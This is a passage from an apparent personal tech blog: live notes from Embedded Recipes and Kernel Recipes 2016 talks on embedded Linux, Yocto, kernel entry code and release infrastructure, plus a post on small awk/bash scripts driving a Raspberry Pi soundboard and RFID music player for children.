VA-API is more interesting, albeit Intel-specific. Still, it requires complex code, and is video-only.

GStreamer is a whole multimedia framework, with a specific way of working(threads, allocation, etc.), not a HW acceleration API. It's not designed for low latency.

FFmpeg/libav is kind of OK, Olivier says, but is not focused on the hardware side. MFT on Windows is close to what Olivier is seeking, but tied to Windows.

Simple Plugin API (SPA)

This is library, coming from Pipewire, matches all of Olivier's requirements: no pipeline, no framework, registered buffers, synchronous or asynchronous modes, externally-provided thread contexts, and not limited to codecs.

It's available on github:

https://github.com/PipeWire/pipewire/tree/master/spa

It can work outside PipeWire, although it hasn't been picked-up elswhere yet.

Introduction to the Yocto Project - OpenEmbedded-core

by Mylène Josserand

Why use a build system ?

There are many constraints in embedded systems to match. You can try building everything manually, but despite the flexibility, it's a dependency hell, and lacks reroducibility. Binary distributions are less flexible, harder to customize, and not available on all architectures.

A build system like Buildroot or Yocto is a middle ground between the two.

In yocto, you have multiple tasks, to download, configure, compile, install, the builds. The tasks are grouped in recipes, and you manage recipes with Bitbake.

Many common tasks are already defined in the OpenEmbedded core. Many recipes are available, organised in layers.

OpenEmbedded is co-maintained by the Yocto Project and OE project. It's the base layer, the core of all the magic as Mylène says.

Workflow

Poky is a distribution built on top of the OpenEmbedded Core, and provides Bitbake.

The general workflow is Download -> Configure -> Compile. You download the proper version you want with git clone.

To add applications, add layers (compilations of recipes). There are folders in your poky directory. Always look at existing layers before creating a recipe. Do not edit upstream layer if you don't want breakage when updating.

To configure the build, you first source the Bitbake environment, which moves you to a build folder, and gives you a set of commands in order to do the build. You can then edit the local.conf to set your MACHINE, which describes the hardware and can be found in specific BSP layers, and setup your DISTRO, which represents top-level configuration that will be applied on every build, and brings toolchains, libc, etc. And then the IMAGE, brings the apps, libs, etc.

Creating a layer

When needed, you might create a layer, whether you have custom hardware, or want to integrate your own-application. You can do that with the yocto-layer tool which does the heavy-lifting. It's a good practice to create multiple layers to share common tasks/recipes between projects.

The recipe are created in .bb files, the format that bitbake understands. The naming of the file is application-name_version.bb, and a file is split in header, source, and tasks parts.

Mylène says it's a good practice to always use remote repositories to host app sources to make development quicker. App sources should never be in the layer directly. The folder organization should always be the same in order to find the recipes faster.

Sometimes, you might want to extend an existing recipe, without modifying it. It's possible with the Bitbake engine, when creating .bbappend files. All .bbappend files are version specific. They can be used to add patches, or customize the install process by appending a task.

Creating an image

An image is a top-level recipe, it has the same format as other recipes, with specific variables on top, like IMAGE_INSTALL to list the included package, or IMAGE_FSTYPES for the binary format of images you want (ext4, tar, etc.).

It's a good practice to only install what you need for your system to work.

Creating a machine

The machine describes the hardware. It contains variables related to the architecture, like TARGET_ARCH for the architecture, or KERNEL_IMAGETYPE.

Mainline Linux on AmLogic SoCs

by Neil Armstrong

The AmLogic SoC Family has multimedia capabilities, and is used in many products. They have different products, ranging from the Cortex-A9 to Cortex A53 CPUs.

The SoCs are very cheap at ~7$ when compared to competitors.

Amlogic SoCs are used in many different cheap Android boxes. They are also in community boards from ODroid, the Khadas VIM1/2, NanoPi K2 or Le Potato which has been designed by BayLibre.

The Libre Computer board has been backed on Kickstarter. Mainline support is done by BayLibre, with many peripherals already working.

The upstream support started from 4.1 by independent hackers. From 4.7, BayLibre started working on it. The bulk of the work went in 4.10 and 4.12.

The work was concentrated on 64bit SoCs (the latest ones), but the devices are very similar inside the family.

Drivers so far

Dynamic Voltage and Frequency Scaling is a complex part of the work, since it's done on a specific CPU in the SoC, but ARM changed the protocol after some time and did not publish the old one at first.

SCPI (the DVFS driver on this SoC) is now supported on 4.10 though.

Kevin Hilman wrote a new eMMC host driver from the original implementation and public datasheet. It's very performant.

At the end of 2016, Amlogic did a new variant S905X of those SoCs, and supporting it was easily done through re-architecturing the Device Tree files.

For CVBS (analog video support), support was integrated in 4.10. For HDMI, Amlogic integrated a Synopsys DesignWare HDMI Controller, and a clean dw-hdmi bridge has been published sharing the code between different SoCs family. The PHY was custom, as well as the HPD though.

CEC support was merged using the CEC framework maintained by Hans Verkuil.

The Mali GPU inside the SoC does not have an open driver. The open source kernel driver is available. But the userspace shared binary is delivered as a blob, that has to be compiled by the SoC vendor to customize it.

Work in progress

There is still a lot of work for the Video Display: cursor plane, overlay planes, osd scaling, overlay scaling are missing for example.

DRM Planes only have a single, primary plane, without scaling. Support for scaling, or planes with different sub-sampling (various YUVformats), overlay planes, is still missing.

In Audio land, S/PDIF input and output is missing. I2S is working for output only through HDMI or external DAC, but the embedded stereo DAC in GXL/GXM or I2S input aren't support.

Video Hardware Acceleration, while one of the best feature of the SoC, is still missing, Neil says. There's at least 6 month of development to have a proper V4L2 driver.

Community

There are a lot of hobbyist hacking on the Odroid-C2 board, and running LibreELEC and KODI. Many raspberry-pi oriented projects are also ported to Amlogic boards.

There are upstream contributions from independent hackers. This is also helped by the growing of Single Board Computer (SBC) diversity with these SoCs.

Long-Term Maintenance, or How to (Mis-)Manage Embedded Systems for 10+ Years

by Marc Kleine-Budde

Marc started by asking the audience who had Embedded Systems in the field, for how long, and which ones were still maintained. Then he asked who had to update to fix a vulnerability, and how long it took to deploy.

The context of the talk are systems created by small teams, using custom hardware, and pushing out new products every few years, that need to be supported for more than 10 years.

The traditional Embedded Systems Lifecycle starts with a Component Version Decision, followed by HW/SW development, then the maintenance starts. It's usually the longest phase.

Marc showed graphs of vulnerabilities per-year in the Kernel, glibc and openssl. Despite most vulnerabilities being Denial of Services, it's still a lot. There's also the infamous "rootmydevice" in a proc file that was in a published linux-sunxi kernel from Allwinner.

Don't trust you vendor kernel, Marc says.

Field Observations

vendor kernels are already obsolete at start of project
the workflow for customized pre-built distributions isn't standard
you get the worst of both world if you select "longterm" components but don't have an update concept
if your update process isn't proven, it's bad
there's a critical vulnerability in a relevant component at least twice a year
upstream only maintain components for 2 to 5 years
Server distros are made for admin interaction, and not suited to embedded systems.

It all leads to the conclusion that Continous Maintenance is very important.

Backporting, while simple at its core — you take a patch and apply it — doesn't scale. As you get more products, versions diverge, as you make local modifications test coverage is reduced, and after a few years, it's almost impossible to decide which upstream fixes are relevant.

If you don't want your product to become part of botnet, you need to have a few safeguards. You need to have short time between incident and fix, have low risk of negative side effects, predict maintenance cost, and have this whole process scalable to multiple products.

These are ingredients for a sustainable process: making sure you can upgrade in the field, review security announcements regularly, always use releases maintained by upstream, disable unused components and enable security hardening.

Development Workflow

It's important to submit changes to upstream to reduce maintenance effort.

You need to automate the processes as early as possible: use CI.

When starting a new project, use the development version of upstream projects, so that when you reach completion, it's in stable state, and still maintained, as opposed to already obsoleted.

Every month, do periodic maintenance: integrate maintenance releases in order to be prepared, review security announcements, and evaluate impact on the product.

When you identify a problem, apply the upstream fix, and leverage your automated build, testing and deployment infrastructure to publish.

Marc advises using Jenkins 2 with Pipeline as Code. For test automation, take there's kernelci.org or LAVA. For redundant boot, barebox as bootchooser, u-boot/grub can do it with custom scripts as well as UEFI. For the update system, there is RAUC, OSTree or Swupdate. Finally, there are now many different rollout schedulers like hawkBit, mender.io, resin.io, but you can also use a static server or custom application.

Conclusion

Marc says that simply ignoring the problem does not work. Don't try ad-hoc fixes, it doesn't scale. Customized server distributions aren't fitted to the embedded use case.

What works is upstreaming, process automation and having a proper workflow.

Developing an embedded video application on dual Linux + FPGA architecture

by Christian Charreyre

The application discussed in this talk has high real time and performance constraints. It must be able to merge and synchronize images issued by 2 cameras, with safety constraints. Target latency is less than 200ms, with boot time less than 5s.

Christian says that in a previous video application, they worked on an ARM SoC with gstreamer, but it didn't match the safety requirements, so they decided to go with a hybrid FPGA+linux solution.

Target hardware is a PicoZED, an System On Module based on a Xilinx Zynq, which embeds and ARM processor as well as an FPGA in the SoC. Its software environment is yocto-based, and does not use the Xilinx-provided solutions Petalinux or Wind River Pulsar Linux, because of their particular quirks. Yocto is now well known and Christian decided to pick-up the meta-xilinx layer and start from that instead. All necessary layers are from the OE layer Index.

The FPGA development are made with the Eclipse-based Xilinx Vivado tool, which enables scripting with tcl.

The AXI bus is used to communicate between the Linux host and the FPGA design. It allows adding devices accessible from Linux, extending the capabilities: for example, a new serial line, dedicated hardware. It also allows dynamically changing the video pipeline by changing the parameters.

Boot mechanism

The PicoZed needs a First Stage Boot Loader (FSBL), before u-boot. This FSBL is generated by the Vivado IDE according to the design. The FSBL then starts u-boot, which starts Linux.

The FPGA can't start alone, and it's code (bitstream) is loaded by the FSBL or u-boot. The Xilinx Linux kernel has a drivers for devices programmed in the FPGA. It uses device tree files to describe the specific configuration available at the moment. Vivado generated the whole device tree, not just the part for the Programmable Logic (FPGA), it merges the two in a single system.dts file.

It's a good idea to automate the process of rebuilding the device tree after each change in Vivado, Christian says.

The boot is comprised of several tasks before showing an image, making boot time optimization a complex problem: FSBL, u-boot, bitstream loading, kernel start, etc. Various techniques were used to reduce boot time. Inside u-boot, the bootstage report was activated, some devices init were disabled.

Bootchart was used to profile Linux startup: the kernel size was reduced, the system console removed, and the init scripts reordered. Filesystem checks were bypassed by using a read-only filesystem. SPI bus speed was increased. Other techniques were used, and the 5 second goal was met.

Closing words

While the design of the system was done so that only the part on the FPGA is impacted by the certification process, the bitstream code is still updated through Linux on the network. Therefore code signing was used in the installer and updater mechanisms to protect the integrity of the system.

According to Christian, the project has many unknown before starting, but those were surmounted. The splitted design constraint payed off. The choice of meta-xilinx layer is good one, because of its good quality. You only need to understand that the device tree is not built within the kernel; once you understand the general structure, it's working well, and the distribution is well tailored to the requirements.

Lightning talks

Atom Linux

by Christophe Blaess

Atom Linux is a new embedded linux distro designed by Christophe. It's a binary distribution, but definitely embedded-oriented. It aims to be industrial-quality.

Atom Linux targets small companies, that already have an embedded Linux project, but with poor embedded Linux knowledge. It aims to provide a secure update system (with rollback, factory defaults, etc.). It want to be power-failure proof with a read-only rootfs, and data backup.

It's easy to configure Christophe says. The base system is already compiled. It provides a UI for configuration. It aims to make custom code integration simple by providing a toolchain in a VM or natively if needed.

The user starts by downloading the base image for his target, then installing the configuration tool. The user configures the base image with a few parameters. The configuration tool merges the prebuilt packages and the user custom code in a new root filesystem image.

This image is then stored in the user's repository (update server), and at first boot, the system does an update.

Currently, the base image builder works, as well as u-boot and the update shell scripts. The first version of the configuration tool is Qt-based, but it's very ugly according to Christophe. He still wants to improve the tool, and rewrite the base image builder as a Yocto layer. Christophe is looking for contributors and ask anyone interested to contact him.

Wayland is coming

by Fabien Lahoudere

Fabien started that he is just a user, not a Wayland developer. Wayland is protocol for compositors to talk to its clients. It's aimed as a simpler replacement for X.

Wayland is designed for modern devices, more performant, simpler to use and configure according to Fabien. It's also more secure, supported by toolkits, and the future of Linux distributions. For instance, it prevents keyloggers, that are very easy to implement with X11.

Wayland is more performant, because it has less ping/pong between the compositor and the clients. Weston is the reference implementation. It's a minimal and fast Wayland compositor. You can extend it by using libweston. There's also AsteroidOS and Maynard which are two embedded-oriented Wayland compositors.

It's also possible to use a "legacy" X application through Xwayland. In fact, Fabien did his whole presentation on a small iMX6Solo based board running evince on top of wayland.

Someone from the audience said they recently had to work with QtCompositor, and it was very simple to use.

Process monitoring with systemd

by Jérémy Rosen

Jérémy says systemd is a very good tool for embedded systems. It cost about ~6Mb of disk space when built with yocto. It's already integrated in Yocto and Buildroot.

systemd makes it easy to secure processes with capabilities, and limits system calls; it can bind mount files to control exactly what a process sees. It makes it easy to control resources with cgroups, as well as monitoring processes.

Jérémy compared moving to systemd from init scripts is like going from svn to git. It requires to understand and re-learn a lot of things, but is really worth it in the end.

systemd provide very fine grained control on how to kill a unit: which command to send, which signal to send when it doesn't work, what cleanup command to run, etc. You can define what is a normal or abnormal stop. It can restart an app automatically, and rate-limit this. You can also do coredump management, soft watchdog monitoring, it also monitors itself with a hardware watchdog.

A fine-grained integration of how services work interact is also available. You can react to hardware changes, filesystem changes, use socket activation, etc.

Jérémy said monitoring is a solved problem for him in embedded and he does not want to work on custom solutions anymore.

That's it for Embedded Recipes first edition ! Congratulations on reading this far !

awk driven IoT

2017-07-05T00:00:00+02:00

With a Raspberry Pi or other modern single-board computers, you can make very simple toys. I started with the hello world of interactive apps: the soundboard. But even then, I was too ambitious.

The soundpad

Since the main target was kids. I wanted a simple, screen-less toy that would teach the basics of interactivity, as well as serve as a platform for learning. A simple soundboard can be quite useful to learn animal calls for instance, so I was set.

But I also wanted this toy to be wireless and interact with the house. For the first part, I decided to hook an old bluetooth game controller I had lying around. I was able to detect its keys with evtest pretty quickly and make an inventory of all buttons keycodes:

For the sounds, I reused the sounds present in the default raspbian scratch installation. There are a few wave files in /usr/share/scratch/Media/Sounds/ that proved useful. I made a few directories with symbolic links to the samples I was interested in. Combining vidir and the previous keycode list, I ensured each wave file name started with a keycode, like this for the Animal sounds:

304-Bird.wav -> /usr/share/scratch/Media/Sounds/Animal/Bird.wav
305-Cricket.wav -> /usr/share/scratch/Media/Sounds/Animal/Cricket.wav
306-Crickets.wav -> /usr/share/scratch/Media/Sounds/Animal/Crickets.wav
307-Dog1.wav -> /usr/share/scratch/Media/Sounds/Animal/Dog1.wav
308-Dog2.wav -> /usr/share/scratch/Media/Sounds/Animal/Dog2.wav
312-Duck.wav -> /usr/share/scratch/Media/Sounds/Animal/Duck.wav
313-Goose.wav -> /usr/share/scratch/Media/Sounds/Animal/Goose.wav
314-Horse.wav -> /usr/share/scratch/Media/Sounds/Animal/Horse.wav
315-HorseGallop.wav -> /usr/share/scratch/Media/Sounds/Animal/HorseGallop.wav
316-Kitten.wav -> /usr/share/scratch/Media/Sounds/Animal/Kitten.wav
317-Meow.wav -> /usr/share/scratch/Media/Sounds/Animal/Meow.wav
318-Owl.wav -> /usr/share/scratch/Media/Sounds/Animal/Owl.wav

In order to interact with the house, I paired a bluetooth soundbar to the raspberry pi.

Once all of this is setup, this is the entirety of the code for the first iteration of the working soundpad (soundboard + joypad):

#!/bin/bash
cd $1
stdbuf -o0 evtest /dev/input/event0| awk -W interactive '
/EV_KEY/ { if ( $NF == 1) { system("paplay " $8 "-*.wav&") }}'

stdbuf is very useful when playing with pipes where the input command is blocking, but you still want interactivity. It allows you to control i/o buffering.
evtest parses input events.
awk -W interactive has the same role as stdbuf -i0, but for mawk's internal buffering (it's not needed for GNU awk).
when a matching line is found, paplay is used to play the audio through pulseaudio's bluez sink, that was previously configured as default. The filename corresponds to the button keycode.

The last iteration has the same core code, but with a bit more setup: using bluetoothctl and pactl to make sure the controller and the soundbars are properly connected and configured mainly.

It worked, for the most part, but was far from plug-and-play. The soundbar needed to be turned on and put in bluetooth mode. The wireless joypad had to be turned on. It needed constant re-setup of the bluetooth connections, because it lost the pairings regularly. And sometimes the audio would stutter horribly. I tried compiling a more recent version of bluez, to no avail.

So after a few day of demos and sample playing, I binned this project about 9 months ago.

The music portal

Fast forward today, I had this thing bothering me about modern music and rhymes for kids. With Deezer & Spotify, we have access to a library we could only dream of. But it's impossible for 2 year old child to operate, or even desirable.

Even without online services, the only alternative would be to go back to the audio CDs. But the only functional CD player in our house is the CD-ROM drive in my Desktop computer; I therefore backup all our audio CDs in audio files. Playing those has the same level of complexity (and screen-interaction) as interoperating with streaming services, so it's back to square one.

That's where the music portal comes in. It's a combination of a Violet Mir:ror I had lying around, and a Raspberry PI with a speaker hooked up.

The Mir:ror is a very simple RFID reader. It's basically plug-and-play on Linux, since it sends raw HID events, with the full ID of the tags it reads, and it has audio and visual feedback. I also evaluated using a Skylanders portal, which also sent raw HID events, but its data was much less detailed, with only two bytes of information in the HID events, and the need to do more work to get the full data, and has no audio or visual feedback.

So here is the code of the first version:

#!/bin/bash
sudo stdbuf -o0 hexdump -C /dev/hidraw0 | awk -W interactive '
/02 01 00 00 08 d0 02 1a  03 52 c1 1a 01 00 00 00/ { print "file1 "; play=1; file="file1.mp3" ; }
/02 01 00 00 08 d0 02 1a  03 52 c1 4b ad 00 00 00/ { print "file2 "; play=1; file="file2.mp3" ; }
/02 01 00 00 04 3f d7 5f  35 00 00 00 00 00 00 00/ { print "dir1 "; play=1; file="dir1/*.mp3" ; }
/  02 02 00 00 0. |01 05 00 00 00 00 00 00  00 00 00 00 00 00 00 00/ { print "stop"; system("killall -q mpg321"); }
{
if (play) {
        system("mpg321 -q " file " & ");
        }
play=0 ;
}
'

we use the same stdbuf and awk -W interactive trick as before. Fun fact: I rediscovered this mawk argument by reading the man page while doing this project because I had forgotten about it in only 9 months. I don't think I'll forget it again.
Here we're matching full HID event lines. We don't even bother decoding the payload size, etc. Since it all fits on a line matchable by awk.
I used mpg321 because it has the less footprint when compared to mpg123, gst-launch, mplayer, vlc, and others.
I used the same symbolic link structure because it's much easier than putting the full file names in the script.
We handle "tag" removal as well as portal shutdown. The Mir:ror automatically shuts down when turned face down.
There are race conditions hiding here. It's not a big deal, it's just a prototype.

What could I use after I setup the two included Nanoztags ? I could put RFID stickers on objects; or I could use my visa card; or anything that has an RFID/NFC feature (like my phone). But there are better, available off-the-shelf choices: toys-to-life like Skylanders ! There are already made for kids, are very sturdy, and I managed to snag a few on clearance at ~1€ a piece !

Make sure the Raspberry Pi is connected to your wireless network, so you can add new songs remotely, and throw in a systemd.service for automatic starting, and the toy is finished:

[Unit]
Description=Music Portal

[Service]
Type=simple
ExecStart=/home/pi/musicportal.sh
User=pi
Group=pi
WorkingDirectory=/home/pi
StandardOutput=journal+console
StandardError=journal+console
Restart=always
RestartSec=3


[Install]
WantedBy=multi-user.target

And it's truly plug-and-play: you just need to plug the Raspberry Pi, and it powers the speaker through USB, as well as the Mir:ror.

Here's a video of the final result:

Last but not least, the title of this article is awk driven IoT. So I integrated librespot, and I can now play songs and rhymes from this online streaming service ! Success ✔

Go Time

2017-02-19T00:00:00+01:00

For the Go 1.8 Release Party in Paris I gave a lightning talk on monotonic clocks. It's essentially a talk version of the Russ Cox's design document on monotonic clocks, which is really well written and sourced. You should go read it !

Here are the slides export and their source.

Embedded Linux Conference Europe 2016

2016-10-21T00:00:00+02:00

I was in Berlin last week for ELCE, and it was great. It was a nice mix of talks on many different subjects, and as always you come back with lots of new ideas and improved motivation.

As you know, I took some notes for Kernel Recipes 2016, and lots of people at ELCE told me they were glad to have read them. I have since updated the article with videos and LWN links for future readers.

Since I was recovering from attending dotGo on monday, and then flying to Berlin, I did not take notes at ELCE this year. But I stumbled during the conference on Arnout Vandecappelle, Buildroot contributor and fellow Embedded Engineer. He took great notes which he posted on his company's blog:

I attended a few of those talks, and I can tell you he did a great recap.

See you next year !

Kernel Recipes 2016 notes

2016-09-28T00:00:00+02:00

Update 2016-10-21: I've added links to the videos and LWN articles, which are of much higher quality than these live notes.

This year I'm trying a live blog of Kernel Recipes 2016, live from Paris, at Mozilla's headquarters. You can watch the live stream here.

The kernel report

by Jonathan Corbet; video

We've had 5 kernel releases since last November, with 4.8 coming out hopefully on Oct 2nd. There were between 12 and 13k changesets for each releases. About 1.5k devs contributed to each release.

The number of developers contributing to each release is stable, growing slowly. For each new releases, there are about 200 first-time contributors.

The development process continues to run smoothly, and not much is changing.

Security

Security is a hot topic right now. Jon showed an impressive list of CVE numbers, estimating that the actual number of flaws is about double that.

The current process for fixing security flaws is like a game of whack-a-mole: there are more and more new flaws, and in the end it's not sure you can keep up.

The distributors also aren't playing their part pushing updates to users.

So vulnerabilites will always be with us, but what is possible is eliminating whole classes of exploits. Examples of this include: - Post-init read-only memory in 4.6 - Use of GCC plugins in 4.8 - Kernel stack hardening in 4.9 - Hardened usercopy in 4.8 - Reference-count hardening is being worked on.

A lot of this originates in grsecurity.net, some of it is being funded by the Core Infrastructure Initiative.

The catch is that there are performance impacts, so it's a tradeoff. So can we convince kernel developers it's worth the cost ? Jonathan is optimistic that the mindsets are changing towards a yes.

Kernel bypass

A new trend is to bypass the kernel stack, for instance in the network stack for people doing High-Frequency-Trading.

Transport over UDP (TOU) is an example of this, enabling applications to make transport protocols in userspace. The QUIC protocol in Chrome is an example of this.

The goal here is to be able to make faster changes in the protocol. For instance, TCP Fast Open has been available for a long time in the kernel, but most devices out there (Android, etc.) have such an old kernel, that nobody is using this.

Another goal is to avoid middlebox interference (for example, they mess with TCP congestion, etc.). So here, the payload is "encrypted" and not understood by those middleboxes, so they can't interfere with it.

The issue with TOU is that we risk having every app (Facebook, Google, etc.) speaking its own protocol, killing interoperability. So the question is will the kernel still be a strong unifying force for the net ?

BPF

The Berkeley Packet Filter is a simple in-kernel virtual machine. Users can load code in the kernel with the bpf() syscall.

It's safe because, there are a lot of rules and limitations to make sure BPF programs do not pose a problem: they can't loop, access arbitrary memory, access uninitialized memory, or leak kernel pointers to user space for example.

The original use car of BPF was of course to filter packets. Nowadays it allows system call restriction with seccomm(), perf events filtering, or tracepoint data filtering and analysis. This is finally the Linux "dtrace".

Process

A lot has changed since 2.4. At the time distributors backported lots of code and out-of-tree features.

Since then, the "upstream first" rule, or the new regular release (every 10 weeks or so) helped solve a lot of problems.

Yet, there are still issues. For instance, a phone running the absolute latest release of Android (7.0), is still running kernel 3.10, which was released in June 2013 and is 221k+ patches behind mainline.

So why is this ? Jonathan says that Fear of mainline kernel is a reason. With the rate of change there's the possibility of new bugs and regressions.

Jon then showed a table compiled by Tim Bird showing that most phones have a vast amount of out-of-tree code to forward port: between 1.1M and 3.1M lines of inserted codes!

Out-of-tree code might be because upstreaming can take a long time. For example, wakelocks or USB changing aren't upstream. Other changes like scheduler rewrites are simply not upstreamable. The kernel moves to slowly for people shipping phones every 6 months.

This is a collision of two points of views: manufacturers say that "nobody will remember our product next year", while kernel developers say they've been here for 25 years and intend to continue be here. This is quite a challenge that the community will have to overcome.

GPL enforcement

To sue or not to sue ?

Some say that companies will not comply without the threat of compliance. Other say that lawsuits would just shut down any discussions with companies that might become contributors in the future.

Contributions stats show that the absolute maximum of independent contributors is about 15%, and that the rest of contributions are coming from people being paid by companies to do so. Therefore alienating those companies might not be the best idea.

Corbet put it this way: do we want support for this current device eventually, or do we want support from companies indefinitely ?

entry_*.S : A carefree stroll through kernel entry code

by Borislav Petrov; video

There are a few reasons for entry into the kernel: system calls, interrupts(software/hardware), and architectural exceptions (faults, traps and aborts).

Interrupts or exceptions entry need and IDT (Interrupt Descriptor table). The interrupt numbers indexes to it for example.

Legacy syscalls had quite an overhead due to segment-based protections. This evolved with the long mode, which requires a flat memory model with paging. Borislav then explains how the setup the MSRs to go into the syscall.

The ABI described is x86-specific (which Borislav is a maintainer of), with which registers to setup (rcx, rip, r11) in order to do a long mode syscall. Borislav explains what the kernel does on x86. Which flags should be set/reset ? Read his slides (or the kernel code) for a nice description.

entry_SYSCALL_64 …

… is the name of the function that takes 6 arguments in registers that is run once we're in the kernel.

SWAPGS is then called, GS and FS being one of the only segments still used. Then the userspace stack pointer is saved.

Then the kenel stack is setup (with a per-cpu-varible) appropriately reading cpu_tss struct.

Once the stack is setup, user pt_regs is constructed and handed to helper functions. A full IRET frame is setup in case of preemption.

After that the thread info flags are looked at in case there's a special situation that needs handling, like ptraced' syscalls.

Then the syscall table is looked at, using the syscall number in RAX. Depending on the syscall needs, it's called more or less differently.

Once the syscall has been called, there is some exit work, like saving the regs, moving pt_regs on stack, etc.

A new thing on the return path is SYSRET, being faster than IRET which is implemented in microcode (saving ~80ns in syscall overhead). SYSRET does less checks. It depends on the syscall, whether it's on slowpath or fastpath.

If the opportunistic SYSRET fails, the IRET is done, after restoring registers and swapping GS again.

On the legacy path, for 32-bit compat syscalls, there might be a leak of 16bits of ESP, which is fixed with per-CPU ministacks of 64B, which is the cacheline size. Those ministacks are RO-mapped so that IRET faults are promoted and get their own stack[…].

cgroup v2 status update

by Tejun Heo; video

The new cgroup rework started in Sep 2012 with gradual cleanups.

The experimental v2 unified hierarchy support was implemented in Apr 2014.

Finally, the cgroup v2 interface was exposed in 4.5.

Differences in v2

The resource model is now consistent for memory, io, etc. Accounting and control is the same.

Some resources spent can't be charged immediately. For instance, an incoming packet might consume a lot of CPU in the kernel before we know to which cgroup to charge these resources.

There's also a difference in granularity, or delegation. For example, what to do when a cgroup is empty is well defined, with proper notification of the root controllers.

The interface conventions have been unified, for example for weight-base resource sharing, the interfaces are consistent accross controllers.

Cpu controller controversy

The CPU controller is still out of tree. There are disagreements around core v2 design features, see this LWN article for details.

A disagreement comes from page-writeback granularity, i.e how to tie a specific writeback operation to a specific thread as opposed to a resource domain.

Another main reason is process granularity. The scheduler only deals with threads, while cgroups don't have thread-granularity, only process-level granularity. This is one of the major disagreements.

The scheduler priority control (nice syscall) is a very different type of interface to the cgroup control interface (echo in a file).

Discussion on this subject is still ongoing.

The rest

A new pids controller was added in 4.3. It allows controlling the small resource that is the PID space (15 bits) and prevent depletion.

Namespace support was added in 4.6, hiding the full cgroup path when you're in a namespace for example. There are still other bugs.

An rdma controller is incoming as well.

Userland support

systemd 232 will start using cgroup v2, including the out-of-tree cpu controller. It can use both cgroup v1 and v2 interfaces at the same time.

libvirt support is being worked on by Tejun Heo as well, which is currently deploying it with systemd at Facebook.

We've had some interesting questions from the audience with regards to some old quirks and security issues in cgroups, but Tejun is quite optimistic that v2 will fix many of those issues and bugs.

Old userland tools will probably be broken once cgroup v2 is the norm, but they are fixable.

from git tag to dnf update

by Konstantin Ryabitsev; video

How is the kernel released ? (presentation)

Step 1: the git tag

It all starts with a signed git tag pushed by Linus. The transport is git+ssh for the push.

It connects to git master, a server in Portland Oregon maintained by the Linux Foundation.

The ssh transport passes the established connection to a gitolite shell. gitolite uses the public key of the connection (through an env variable) to identify the user. Then the user talks to the gitolite daemon.

Before the push is accepted, a two-factor authentication is done via 2fa-val. This daemon allows the user to validate an IP address for a push. It uses the TOTP protocol. The 2fa token is sent through ssh by the user. It allows the user to authorize an IP address for a certain period of time (usually 24h).

Once the push is accepted, gitolite passes control to git for the git protocol transfer.

As a post-commit hook, the "grokmirror" software is used to propagate changes to the frontend servers.

grokmirror updates a manifest that is served through httpd (a gzipped json file), on a non-publicly accessible server.

On a mirror server connected through a VPN, the manifest is checked for changes every 15 seconds, and if there's a change, the git repo is pulled.

On the frontend, the git daemon is running, serving updates the repo.

Step 2: the tarball

To generate the tar, the git archive command is used. The file is then signed with gpg.

kup (kernel uploader) is then used to upload the tarball. Or it can ask the remote to generate the tarball itself from a given tag, saving up lots of bandwidth. Only the signature is then uploaded. Then the archive is compressed and put in the appropriate public directory.

kup uses ssh transport as well to authentify users. The kup server store the tarball in a temporary storage.

The tarball is then downloaded by the marshall server, and copied over nfs to the pub master server.

The pub master server is mounted over nfs on rasperry pi that watches directory changes and updates the sha256sums file signatures. On marshall, builder server checks if the git tag and tarball are available and then runs pelican to update the kernel.org frontpage.

Finally, to publicly get the tarballs, you shouldn't use ftp. It is recommended to use https or rsync, or even https://cdn.kernel.org which uses Fastly.

Maintainer's Don't Scale

by Daniel Vetter; video, LWN article

I took break here so you'll only find a summary of the talk. Talk description here

Daniel exposes the new model adopted by the open source intel graphics team to include every regular contributor as Maintainer. His trick ? Give them all commit access.

The foreseen problems failed to materialize. Everything now works smoothly. Can this process be applied elsewhere ?

Patches carved into stone tablets

by Greg Kroah-Hartman; video, LWN article

Why do we use mail to develop the kernel? presentation

Because it is faster than anything else. There are 7 to 8 changes per hour. 75 maintainer took on average 364 patches.

There are a lot of reviewers.

A good person knows how to choose good tools. So Greg reviews a few tools.

Github is really nice: free hosting, drive-by contributors, etc. It's great for small projects. The downside is that it doesn't scale for large projects. Greg gives kubernetes as an example: there are 4000+ issues, 500+ outstanding pull requests. Github is getting better at handling some issues, but still requires constant Internet access, while the kernel has contributors that don't have constant Internet access.

gerrit's advantage is that project managers love it, because it gives them a sense of understanding what's going on. Unfortunately, it makes patches submissions hard, it's difficult to handle patch series, and doesn't allow viewing a whole patch at once if it touches multiple files. It's slow to use, but it makes local testing hard, people have to work around it with scripts. Finally, it's hard to maintain as a sysadmin.

email

Plain text email has been around since forever. It's what the kernel uses. Everybody has access to email. It works with many types of clients. It's the same tool you use for other types of work. A disadvantage is gmail, exchange, outlook: many clients suck. Gmail as a webserver is good.

Read Documentation/email_clients.txt in order to learn how to configure yours.

Another advantage of email, is that you don't need to impose any tool. Some kernel developers don't even use git ! Although git works really well with email: it understands patches in mailbox format (git am), and you can pipe emails to it.

Project managers don't like it though because they don't see the status.

But there's a simple solution: you can simply install Patchwork, which you plug into your mailing list, and it gives you a nice overview of the current status. There's even a command line client.

Why does it matter ? Greg says it's simple, has a wide audience, it's scalable, and grows the community by allowing everybody to read and understand how the development process works. And there are no project managers.

Kubernetes and docker (github-native projects) are realizing this.

Greg's conclusion is that email is currently the best (or less worse?) tool for the job.

Why you need a test strategy for your kernel development

by Laurent Pinchard; video

Laurent showed us an example of how a very small, seemingly inconsequential change might introduce quite a bug. There's a need to test everything before submitting.

The toolbox used when he started to test his v4l capture driver is quite simple and composed of a few tools ran in the console, in two different telnet connections.

He quickly realized that running the commands every time wouldn't scale. After writing a script simplifying the commands, he realized running the script in each of the 5 different terminal connection wouldn't scale either.

After this, he automated even further by putting images to be compared in a directory and comparing them with the output. But the test set quickly grew to over a gigabyte of test files.

Instead of using static files, the strategy was then to generate the test files on the fly with an appropriate program.

He then ran into an issue where the hardware wasn't sending data according to the datasheet. While looking at the data, he discovered he had to reverse engineer how he hardware worked for a specific image conversion algorithm (RGB to HSV).

The rule of thumb Laurent advises is to have one test per feature. And to add one test for each bug. Finally, to add a test for each non-feature. For example, when you pass two opposite flags, you should get an error.

The test suite Laurent developed is called vsp-tests and is used to test the specific vsp driver he has been working on. There are many other kind of tests in the kernel(selftests, virtual drivers...), or outside of it (intel-gpu-tools, v4l2-compliance, linaro lava tests...).

While there are many test suites in the kernel development, there's no central place to run all of these.

Regarding CI, the 0-Day project now monitors git trees and kernel mailing lists, performs kernel builds for many architectures, in a patch-by-patch way. On failure it sends you an email. It also runs coccinelle, providing you a patch to fix issues detected by coccinelle. Finally, it does all that in less than one hour.

